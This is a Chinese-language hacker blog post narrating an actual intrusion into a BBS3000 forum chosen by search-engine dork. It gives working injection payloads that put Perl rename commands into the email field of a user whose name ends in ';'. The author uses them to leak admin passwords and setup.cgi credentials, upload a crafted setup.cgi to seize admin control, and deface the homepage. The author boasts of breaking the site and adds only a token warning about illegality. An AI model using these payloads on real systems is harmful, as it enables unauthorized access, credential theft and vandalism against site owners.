我的一次入侵bbs3000取得最高权限

/ns/hk/hacker/data/20020810041233.htm



我的一次入侵bbs3000取得最高权限

温柔小刀



刚看完一篇关于cgi的解析机制的文章,发现了一些漏洞可能可以利用,就拿bbs3000开刀试试。
先上网搜索一个bbs3000的论坛,在google.com键入”bbs/list.cgi“,出来了一大堆,看到一个粘贴美女图的论坛很不爽,就拿你开刀。先注册一用户名为;字符,密码为空格,信箱为
rename "admin.cgi","readme.txt";#@3wcool.com
(这里假设admin为该论坛的社区区长,也就是该论坛最大权限的用户,readme.txt 为自己随便起的一个txt文件),然后我们在IE地址栏内输入:
http://x.x.x.x/bbs3000/yhzl/;.cgi
(x.x.x.x为该网站的域名,下同)
返回的页面显示
'F:\wwwroot\bbs3000\yhzl\;.cgi' script produced no output 后面的就是关键了,再输入这样
的看看
http://x.x.x.x/bbs3000/yhzl/readme.txt
返回的页面显示为
admin admin http://x.x.x.x 2002-04-16
显示的内容前面就是密码、用户
天啊,事情怎么那么容易呀!!~_*

再修改资料把信箱改成rename "readme.txt","admin.cgi";#@3wcool.com
这样就可以用admin登入论坛了,之后你就可以,哈哈,不要扔我。
再跑的
http://x.x.x.x/bbs3000/cjyh.cgi输入用户admin,密码admin,我靠,居然不行,区长设置的管理密码和他的用户密码不一样。那好,我看你的setup.cgi里面的密码是什么。
再把我的油箱改成
rename "../setup.cgi","readme.cgi";#@3wcool.com
然后重复上面步骤在IE地址栏内输入:
http://x.x.x.x/bbs3000/yhzl/;.cgi
(x.x.x.x为该网站的域名,下同)
返回的页面显示
'F:\wwwroot\bbs3000\bbs3000\yhzl\;.cgi' script produced no output 后面的就是关键了,再输入这样
的看看
http://x.x.x.x/bbs3000/yhzl/readme.txt
返回的页面显示为
$admname="admin";
$delpsd="admin123";
$imagurl="http://x.x.x.x/bbs/image";
$filepath="D:/wwwroot/cgi-bin/bbs";
$ImgDir="D:/wwwroot/bbs/image";
$ym="http://x.x.x.x/cgi-bin/bbs";
…………
……
则管理员帐号为admin,密码为admin123,返回登入管理界面,靠,现在是什么都不行了,因为论坛缺少了setup.cgi这个文件,所有的cgi都打不开了,拿了密码也没有用了。下线,等斑竹自己修复,我还要去背单词,要考试了。(可能你们要问为什么邮箱不用copy "../setup.cgi","readme.cgi";#@3wcool.com,我试过,没用,可能是权限不够)
到了晚上再来看看论坛已经修好了,我不罢休换个思路再来。
我先发表了一篇文章,随便写点,肯定会被删的东西。然后用论坛上传文件的功能,上传了一个bbs3000原程序中的setup.cgi,自己定义好管理员帐号,密码;再改成的read.txt文件,因为后缀是cgi的文件,论坛不支持。发表后查看那个read.txt文件的路径为
http://x.x.x.x/bbs/image/affix/20010615135901.txt
好的, 抄出旧刀,把;的邮箱改成
rename "../../bbs/20010615135901.txt","../setup.cgi";#@3wcool.com
然后在IE地址栏内输入:
http://x.x.x.x/bbs3000/yhzl/;.cgi
好,这下就可以用自己定义的帐号,密码登入管理界面了.
在狠一点,把邮箱改改,上传一个首页把它的首页更换掉。
哈,怎一个爽字了的。
心情好的时候,一口气背了100面单词…………


有几点值得注意的:
1:此漏洞对于目前发行的一切bbs3000版本都通吃。
2:此漏洞只存在与win2000的机子,且cgi是采用应用程序映射:perlIS.dll应用程序映射的,很多空间又支持asp又支持cgi的多为这种。
3:啊,怎么有人比我先注册了;这个用户名,看来已经背他洗劫过一次了,没有关系,换个用户名1;或2;只要最后是;的什么都行,什么斑竹把用户名含;过滤掉了,拿就随便注册一个把邮箱改成
;rename "admin.cgi","readme.txt";#@3wcool.com
前面加一个;号。
好了,告诉大家一句,擅自更改删除别人的数据为违法行为,请大家不要太过分。



来源:小凤居